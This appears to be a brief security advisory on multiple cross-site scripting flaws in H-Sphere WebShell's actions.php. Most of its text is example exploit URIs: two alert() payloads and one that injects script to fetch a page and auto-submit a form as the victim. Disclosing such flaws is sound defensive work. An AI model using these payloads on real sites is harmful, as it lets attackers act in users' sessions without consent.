H-Sphere WebShell 'actions.php' Multiple Cross Site Scripting Vulnerabilities

H-Sphere WebShell 'actions.php' Multiple Cross Site Scripting Vulnerabilities

To exploit these issues an attacker entices an unsuspecting user into following a malicious URI.

The following example URIs are available:

http://www.example.com/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E

http://www.example.com/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]

http://www.example.com/actions.php?m=sysinfo&tab=1'><img/src/onerror=with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}